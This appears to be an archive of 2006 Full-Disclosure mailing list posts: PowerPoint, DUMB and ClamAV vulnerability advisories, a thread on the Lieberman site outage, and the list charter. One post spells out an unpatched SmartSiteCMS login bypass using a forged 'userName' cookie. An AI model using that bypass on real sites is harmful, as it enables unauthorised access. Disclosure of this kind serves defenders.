There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -BEGIN PGP SIGNATURE- Version: PGP Desktop 9.0.6 (Build 6060) iQA/AwUBRNjnr3s2oPjapNRZEQL2PACdG+dBRMiOzRJU+uGmd12yzBKpxo8AoL65 wNMwLcHW71e5bBcwrAvyg8Xh =jVVp -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Microsoft PowerPoint Malformed Record Memory Corruption
Microsoft PowerPoint Malformed Record Memory Corruption Vulnerability By Sowhat of Nevis Labs 2006.08.08 http://www.nevisnetworks.com http://secway.org/advisory/AD20060808.txt Vendor Microsoft Inc. Microsoft PowerPoint 2000 Microsoft PowerPoint 2002 Microsoft Office PowerPoint 2003 PowerPoint 2004 for Mac PowerPoint 2004 v. X for Mac Remote: YES Exploitable: maybe ;) CVE: CVE-2006-3449 Overview: This vulnerability allows remote attackers to execute arbitrary code in the context of the logged in user. An array boundary condition may be violated by a malicious .PPT file in order to redirect execution into attacker-supplied data. Exploitation requires that the attacker coerce or persuade the victim to open a malicious .PPT file. Details: The specific flaw exists within the parsing of the BIFF(?) file format used by Microsoft PowerPoint. There will be a memory corruption during the analysis of a malformed PPT Record. The disassembly code: 3009a818 3945fc cmp [ebp-0x4],eax 3009a81b 7703 ja POWERPNT+0x9a820 (3009a820) 3009a81d 8b45fc mov eax,[ebp-0x4] 3009a820 8b7308 mov esi,[ebx+0x8] 3009a823 8b7d08 mov edi,[ebp+0x8] 3009a826 2945fc sub [ebp-0x4],eax 3009a829 014508 add [ebp+0x8],eax 3009a82c 8bc8 mov ecx,eax 3009a82e 8bd1 mov edx,ecx 3009a830 c1e902 shr ecx,0x2 3009a833 f3a5 rep movsd Access violation here. :) 3009a835 8bca mov ecx,edx 3009a837 83e103 and ecx,0x3 3009a83a f3a4 rep movsb 3009a83c 014308 add [ebx+0x8],eax 3009a83f 014318 add [ebx+0x18],eax 3009a842 837dfc00 cmp dword ptr [ebp-0x4],0x0 3009a846 75b7 jnz POWERPNT+0x9a7ff (3009a7ff) 3009a848 8b450c mov eax,[ebp+0xc] 3009a84b 5f pop edi 3009a84c 5e pop esi 3009a84d 5b pop ebx 3009a84e c9 leave 3009a84f c20800 ret 0x8 Code execution may possible. POC: No POC will be supplied Fix: Microsoft has released an update for Microsoft Office which is set to address this issue. This can be downloaded from: http://www.microsoft.com/technet/security/bulletin/MS06-048.mspx Vendor Response: 2006.07.14 Vendor notified via [EMAIL PROTECTED] 2006.07.15 Vendor responded 2006.08.08 Vendor released MS06-048 patch 2006.08.08 Advisory released Common Vulnerabilities and Exposures (CVE) Information: The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. CVE-2006-3449 Greetings to Becky PhD. ;) Reference: 1. http://www.microsoft.com/technet/security/Bulletin/MS06-048.mspx 2. http://secway.org/vuln.htm -- Sowhat http://secway.org Life is like a bug, Do you know how to exploit it ? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200608-14 ] DUMB: Heap buffer overflow
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200608-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: DUMB: Heap buffer overflow Date: August 08, 2006 Bugs: #142387 ID: 200608-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A heap-based buffer overflow in DUMB could result in the execution of arbitrary code. Background == DUMB (Dynamic Universal Music Bibliotheque) is an IT, XM, S3M and MOD player library. Affected packages = --- Package / Vulnerable / Unaffected --- 1 media-libs/dumb 0.9.3-r1= 0.9.3-r1 Description === Luigi Auriemma found a heap-based buffer overflow in the it_read_envelope function which reads the envelope values for volume, pan and pitch of the instruments referenced in a .it (Impulse Tracker) file with a large number of nodes. Impact == By enticing a user to load a malicious .it (Impulse Tracker) file, an attacker may execute arbitrary code with the rights of the user running the application that uses a vulnerable DUMB library. Workaround == There is no known workaround at this time. Resolution == All users of DUMB should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =media-libs/dumb-0.9.3-r1 References == [ 1 ] CVE-2006-3668 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3668 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200608-14.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpKKyeNNAoRE.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Much Ado Over Whether Lieberman Campaign Site Was Hacked
Some questioning of the Kos version here: http://www.brendanloy.com/2006/08/apparent-dos-attack-takes-out-lieberman-website.html On Tue, 2006-08-08 at 15:21, kaiser scapegoat wrote: MSNBC has been reporting that the Lieberman campaign site was hacked. There have been numerous theories on this since it was reported yesterday. Thought you all might be interested in the attempt at technical analysis taking place on Daily Kos: http://www.dailykos.com/story/2006/8/8/144119/5628 _ Dont just search. Find. Check out the new MSN Search! http://search.msn.click-url.com/go/onm00200636ave/direct/01/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- --- My skills and contact info: http://www.blcss.com/contactme.php Public Freenet gateway: http://blcss.com/cgi-bin/fr.pl ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Much Ado Over Whether Lieberman CampaignSite Was Hacked
Hmmm - Lieberman forgot to pay his bills was the story yesterday - when the default page said to call the billing department. Much discussion ensued from the accusation yesterday, and Lieberman was surely aware of all the questions when he called a press conference this morning to blame the Lamont campaign. This was an 11th hour drop letter Rovian tactic if there ever was one. Even if Lieberman doesn't know what's going on with his server, he certainly engineered the way he's exploiting it. The focus is not on getting the site back up or accepting Lamont's proffered help - the focus is on getting the mainstream media to report that Lieberman has accused Lamont supporters of hacking. And the mainstream media fell for it: MSNBC, CNN, New York Times... Kos is now just saying Lieberman is paying the price for skimping on the web site: http://www.dailykos.com/story/2006/8/8/153827/3493 Alternatively...someone attempting to explain why the site is still down: http://www.dailykos.com/story/2006/8/8/172032/7796 From: Rowland [EMAIL PROTECTED] To: kaiser scapegoat [EMAIL PROTECTED] CC: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Much Ado Over Whether Lieberman CampaignSite Was Hacked Date: 08 Aug 2006 17:01:28 -0400 Some questioning of the Kos version here: http://www.brendanloy.com/2006/08/apparent-dos-attack-takes-out-lieberman-website.html On Tue, 2006-08-08 at 15:21, kaiser scapegoat wrote: MSNBC has been reporting that the Lieberman campaign site was hacked. There have been numerous theories on this since it was reported yesterday. Thought you all might be interested in the attempt at technical analysis taking place on Daily Kos: http://www.dailykos.com/story/2006/8/8/144119/5628 _ Dont just search. Find. Check out the new MSN Search! http://search.msn.click-url.com/go/onm00200636ave/direct/01/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- --- My skills and contact info: http://www.blcss.com/contactme.php Public Freenet gateway: http://blcss.com/cgi-bin/fr.pl _ Dont just search. Find. Check out the new MSN Search! http://search.msn.click-url.com/go/onm00200636ave/direct/01/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Much Ado Over Whether Lieberman Campaign Site Was Hacked
Ha! I had a pretty good laugh at that attempt. While not as bad as tubes full of internets, Kos should stick to punditry. On 8/8/06, kaiser scapegoat [EMAIL PROTECTED] wrote: MSNBC has been reporting that the Lieberman campaign site was hacked. There have been numerous theories on this since it was reported yesterday. Thought you all might be interested in the attempt at technical analysis taking place on Daily Kos: http://www.dailykos.com/story/2006/8/8/144119/5628 _ Don't just search. Find. Check out the new MSN Search! http://search.msn.click-url.com/go/onm00200636ave/direct/01/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: Will Microsoft patch remarkable old Msjet40.dll issue?
New monthly updates from Microsoft don't include patch to Msjet40.dll vulnerability affecting Access and some other products. There is patch to critical 0-day vulnerability in PowerPoint aka Mso.dll vulnerability (CVE-2006-3590): http://www.microsoft.com/technet/security/bulletin/ms06-048.mspx - Juha-Matti ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: micosoft.com xss
Painfully obvious, yet I did pwn about every megacorp on the block :pOn 08/08/06, Mad World [EMAIL PROTECTED] wrote:For such a words you could eat your hat if I would like to go in public. It's a last time i am teaching script kiddies for something beond their understanding.I would like that you have at least small area in your brains that restricts your tong.If you wouldn't be script kiddie you would take your words back and learn instead. Yesterdays code is here: ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2006:138 ] - Updated clamav packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:138 http://www.mandriva.com/security/ ___ Package : clamav Date: August 8, 2006 Affected: 2006.0, Corporate 3.0 ___ Problem Description: Damian Put discovered a boundary error in the UPX extraction module in ClamAV which is used to unpack PE Windows executables. This could be abused to cause a Denial of Service issue and potentially allow for the execution of arbitrary code with the permissions of the user running clamscan or clamd. Updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4018 ___ Updated Packages: Mandriva Linux 2006.0: 7160be474b24613a61e0544bc51f7f86 2006.0/RPMS/clamav-0.88.4-0.1.20060mdk.i586.rpm 8eaf5d27daa93c18117d72991d04f6a2 2006.0/RPMS/clamav-db-0.88.4-0.1.20060mdk.i586.rpm 27781d61cf85dd88b8d83586d4831e1c 2006.0/RPMS/clamav-milter-0.88.4-0.1.20060mdk.i586.rpm ee41c72a28b45af3a8bc8a01b24680c1 2006.0/RPMS/clamd-0.88.4-0.1.20060mdk.i586.rpm 0a9fb0940a123a7347920c22a9453282 2006.0/RPMS/libclamav1-0.88.4-0.1.20060mdk.i586.rpm 89af9807ff0787621c51c0a6cf2545a0 2006.0/RPMS/libclamav1-devel-0.88.4-0.1.20060mdk.i586.rpm 034456a7e7e5c583403c69b06fb2b7c0 2006.0/SRPMS/clamav-0.88.4-0.1.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 8fc81c2d735a98c48c84abc4654c947e x86_64/2006.0/RPMS/clamav-0.88.4-0.1.20060mdk.x86_64.rpm 0b306fe32d6e833e1ac45bd485fa2e93 x86_64/2006.0/RPMS/clamav-db-0.88.4-0.1.20060mdk.x86_64.rpm fba26b042f08e0edbea94f26e3b0093e x86_64/2006.0/RPMS/clamav-milter-0.88.4-0.1.20060mdk.x86_64.rpm 50fc585d63d14daceeec889d52f4e1e1 x86_64/2006.0/RPMS/clamd-0.88.4-0.1.20060mdk.x86_64.rpm cf9e501d41c3951c158647aeb28a018f x86_64/2006.0/RPMS/lib64clamav1-0.88.4-0.1.20060mdk.x86_64.rpm 9734f7d218bf446ac403584198d035bd x86_64/2006.0/RPMS/lib64clamav1-devel-0.88.4-0.1.20060mdk.x86_64.rpm 034456a7e7e5c583403c69b06fb2b7c0 x86_64/2006.0/SRPMS/clamav-0.88.4-0.1.20060mdk.src.rpm Corporate 3.0: 8995669334c70e4abe03a130291ceee3 corporate/3.0/RPMS/clamav-0.88.4-0.1.C30mdk.i586.rpm b4d5bb40c553484ece891b5ccf6b9946 corporate/3.0/RPMS/clamav-db-0.88.4-0.1.C30mdk.i586.rpm beca95463cea696152f9b25f57fee24c corporate/3.0/RPMS/clamav-milter-0.88.4-0.1.C30mdk.i586.rpm 35dd7bff362ed54c8e052ba3182bff91 corporate/3.0/RPMS/clamd-0.88.4-0.1.C30mdk.i586.rpm 620db7610ccc4c7b05d0580634217e14 corporate/3.0/RPMS/libclamav1-0.88.4-0.1.C30mdk.i586.rpm 943964d75379bfbf9db16aa44a6965a4 corporate/3.0/RPMS/libclamav1-devel-0.88.4-0.1.C30mdk.i586.rpm 2ae9a4d818dce236123140f9edbaa742 corporate/3.0/SRPMS/clamav-0.88.4-0.1.C30mdk.src.rpm Corporate 3.0/X86_64: 873e244792ddb282ba7d5d3780644198 x86_64/corporate/3.0/RPMS/clamav-0.88.4-0.1.C30mdk.x86_64.rpm 45a538b5fc07847628b32f4346f4683e x86_64/corporate/3.0/RPMS/clamav-db-0.88.4-0.1.C30mdk.x86_64.rpm 5eef3b58eba440748a40d144adc9f36c x86_64/corporate/3.0/RPMS/clamav-milter-0.88.4-0.1.C30mdk.x86_64.rpm e2cb732e7b7a676a330784f2414d7700 x86_64/corporate/3.0/RPMS/clamd-0.88.4-0.1.C30mdk.x86_64.rpm 686e984920647ab725f6a79249673663 x86_64/corporate/3.0/RPMS/lib64clamav1-0.88.4-0.1.C30mdk.x86_64.rpm 78e63226b709d850781813c2e5ea9b08 x86_64/corporate/3.0/RPMS/lib64clamav1-devel-0.88.4-0.1.C30mdk.x86_64.rpm 2ae9a4d818dce236123140f9edbaa742 x86_64/corporate/3.0/SRPMS/clamav-0.88.4-0.1.C30mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFE2QkRmqjQ0CJFipgRAmb4AJ9/p5ePaOBGS4Vc3kbTZJ8iwzwMYwCeIolo qeIu8V7G7ZFIGDkQuO+HZSo= =frsA -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by
[Full-disclosure] SmartSiteCMS v1.0 authentication bypass
SmartSiteCMS v1.0 authentication bypass
STATUS: I contacted the vendor more than 2 months ago and still no response.
TECHNICAL INFO
One of the worst cms I've ever seen regarding security, no input sanitation
at all. Bypassing authentication just requires to create a cookie named
userName
Vulnerable code:
admin.php line 43
?php
if (isset($_COOKIE['userName']))
{
VULNERABLE VERSIONS
---
Ive only tested v1.0
---
Contact information
:Paulino Calderon
:nahsuckea.com
:http://nah.suckea.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] List Charter
[Full-Disclosure] Mailing List Charter John Cartwright [EMAIL PROTECTED] - Introduction Purpose - This document serves as a charter for the [Full-Disclosure] mailing list hosted at lists.grok.org.uk. The list was created on 9th July 2002 by Len Rose, and is primarily concerned with security issues and their discussion. The list is administered by John Cartwright. The Full-Disclosure list is hosted and sponsored by Secunia. - Subscription Information - Subscription/unsubscription may be performed via the HTTP interface located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure. Alternatively, commands may be emailed to [EMAIL PROTECTED], send the word 'help' in either the message subject or body for details. - Moderation Management - The [Full-Disclosure] list is unmoderated. Typically posting will be restricted to members only, however the administrators may choose to accept submissions from non-members based on individual merit and relevance. It is expected that the list will be largely self-policing, however in special circumstances (eg spamming, misappropriation) then offending members may be removed from the list by the management. An archive of postings is available at http://lists.grok.org.uk/pipermail/full-disclosure/. - Acceptable Content - Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information. Gratuitous advertisement, product placement, or self-promotion is forbidden. Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible. Humour is acceptable in moderation, providing it is inoffensive. Politics should be avoided at all costs. Members are reminded that due to the open nature of the list, they should use discretion in executing any tools or code distributed via this list. - Posting Guidelines - The primary language of this list is English. Members are expected to maintain a reasonable standard of netiquette when posting to the list. Quoting should not exceed that which is necessary to convey context, this is especially relevant to members subscribed to the digested version of the list. The use of HTML is discouraged, but not forbidden. Signatures will preferably be short and to the point, and those containing 'disclaimers' should be avoided where possible. Attachments may be included if relevant or necessary (e.g. PGP or S/MIME signatures, proof-of-concept code, etc) but must not be active (in the case of a worm, for example) or malicious to the recipient. Vacation messages should be carefully configured to avoid replying to list postings. Offenders will be excluded from the mailing list until the problem is corrected. Members may post to the list by emailing [EMAIL PROTECTED] Do not send subscription/ unsubscription mails to this address, use the -request address mentioned above. - Charter Additions/Changes - The list charter will be published at http://lists.grok.org.uk/full-disclosure-charter.html. In addition, the charter will be posted monthly to the list by the management. Alterations will be made after consultation with list members and a concensus has been reached. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
